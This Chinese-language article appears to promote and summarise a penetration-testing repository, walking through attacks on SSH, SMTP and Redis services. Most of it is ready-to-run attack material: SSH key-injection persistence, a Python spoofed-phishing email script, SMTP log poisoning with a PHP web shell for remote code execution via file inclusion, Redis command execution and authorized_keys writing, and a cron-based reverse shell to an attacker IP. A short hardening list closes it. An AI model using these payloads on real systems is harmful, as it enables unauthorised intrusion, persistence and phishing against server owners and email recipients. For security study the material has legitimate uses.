服务漏洞利用详解:《APT Individual Combat Guide》SSH、SMTP与Redis攻击方法
【免费下载链接】APT-Individual-Combat-Guide《APT Individual Combat Guide》项目地址: https://gitcode.com/gh_mirrors/ap/APT-Individual-Combat-Guide
《APT Individual Combat Guide》是一份全面的网络安全学习资料,涵盖了多种服务漏洞的利用方法。本文将详细介绍其中SSH、SMTP和Redis服务的攻击手段,帮助新手和普通用户了解这些常见服务的安全风险及防范措施。
一、SSH服务漏洞利用全解析 🚀
SSH(Secure Shell)是远程管理服务器的常用协议,但配置不当或存在漏洞时,可能成为攻击者的入口。《APT Individual Combat Guide》中提到了多种SSH攻击方法,包括暴力破解、密钥窃取和隧道技术等。
1.1 SSH暴力破解与默认凭证攻击
攻击者常通过暴力破解尝试获取SSH登录凭证。项目中提供了两个实用的字典文件:
- 默认字典
- 20个最常用的SSH密码
使用Metasploit的ssh_enumusers模块可枚举SSH用户名:
msf> use scanner/ssh/ssh_enumusers1.2 SSH密钥注入与持久化
通过公钥注入,攻击者可实现无密码登录。关键步骤如下:
ssh-keygen -t rsa -b 2048 -C "邮箱" ssh-copy-id -oHostKeyAlgorithms=+ssh-rsa -i .ssh/id_rsa.pub user@hostnameMetasploit的post/linux/manage/sshkey_persistence模块可实现密钥持久化:
run post/linux/manage/sshkey_persistence1.3 SSH隧道技术与网络穿透
SSH隧道可用于绕过防火墙限制,常见类型包括:
- 动态隧道:
ssh -D 1080 -C -N 用户名@SSH服务器 - 本地隧道:
ssh -L 本地端口:目标服务器IP:目标端口 用户名@SSH服务器 - 远程隧道:
ssh -R 远程端口:客户端IP:客户端端口 用户名@攻击者SSH服务器 -N
图:Kali Linux渗透测试全流程详解 - 包含SSH攻击技术的实战指南
二、SMTP服务漏洞深度剖析 📧
SMTP(简单邮件传输协议)漏洞可能导致邮件欺骗、信息泄露甚至远程代码执行。项目中详细介绍了SMTP枚举、邮件伪造和日志投毒等攻击方法。
2.1 SMTP用户枚举与信息泄露
通过VRFY和EXPN命令可枚举邮件用户:
HELO x VRFY root EXPN sshd使用nmap脚本可快速检测SMTP服务信息:
nmap -p587 --script smtp-ntlm-info -v [IP]2.2 SMTP邮件伪造与钓鱼攻击
利用Python可发送伪造邮件,关键代码如下:
import smtplib from email.mime.text import MIMEText msg = MIMEText("钓鱼内容", 'plain') msg['From'] = "administrator@victim.com" msg['To'] = "target@example.com" msg['Subject'] = "紧急通知" server = smtplib.SMTP('smtp.example.com', 25) server.sendmail(msg['From'], msg['To'], msg.as_string()) server.quit()2.3 SMTP日志投毒与远程代码执行
通过SMTP日志投毒结合LFI漏洞可实现RCE:
- 发送包含恶意代码的邮件:
DATA Subject: Test <?php system($_GET['cmd']); ?> .- 通过LFI访问日志文件:
http://target.com/vulnerable.php?file=/var/log/mail.log&cmd=id三、Redis服务漏洞利用实战 🔑
Redis是一款流行的内存数据库,若配置不当(如未授权访问),可能导致严重安全后果。项目中详细介绍了未授权访问、命令执行和持久化攻击等方法。
3.1 Redis未授权访问与命令执行
未授权访问Redis后,可直接执行系统命令:
redis-cli -h IP地址 EVAL "os.execute('id')" 03.2 写入SSH公钥实现无密码登录
通过Redis写入SSH公钥:
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt cat foo.txt | redis-cli -h 目标服务器IP -x set ssh_key redis-cli -h 目标服务器IP config set dir /root/.ssh/ redis-cli -h 目标服务器IP config set dbfilename authorized_keys redis-cli -h 目标服务器IP save3.3 Redis反弹Shell与持久化攻击
利用Redis写入计划任务实现反弹Shell:
redis-cli -h 目标服务器IP config set dir /var/spool/cron/ redis-cli -h 目标服务器IP config set dbfilename root redis-cli -h 目标服务器IP set x "\n* * * * * /bin/bash -i >& /dev/tcp/攻击者IP/4444 0>&1\n" redis-cli -h 目标服务器IP save图:不同语言和库对URL解析的差异 - 影响Redis等服务的SSRF漏洞利用
四、漏洞防范最佳实践 🛡️
针对上述服务漏洞,建议采取以下防范措施:
SSH安全加固:
- 使用密钥登录,禁用密码认证
- 限制SSH访问IP,使用防火墙策略
- 定期更换密钥,避免使用弱密钥
SMTP安全配置:
- 禁用VRFY和EXPN命令
- 启用SPF、DKIM和DMARC邮件验证
- 限制邮件中继,防止滥用
Redis安全防护:
- 启用密码认证,设置复杂密码
- 绑定本地回环地址,避免公网访问
- 以低权限用户运行Redis服务
通过《APT Individual Combat Guide》中的这些方法,安全人员可以更好地理解和防御SSH、SMTP和Redis服务漏洞。建议在合法授权的环境下进行测试,遵守网络安全法律法规。
要获取完整资料,请克隆项目仓库:
git clone https://gitcode.com/gh_mirrors/ap/APT-Individual-Combat-Guide项目中还包含更多服务漏洞利用方法,如Docker、FTP和SMB等,感兴趣的读者可以深入学习。
【免费下载链接】APT-Individual-Combat-Guide《APT Individual Combat Guide》项目地址: https://gitcode.com/gh_mirrors/ap/APT-Individual-Combat-Guide
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考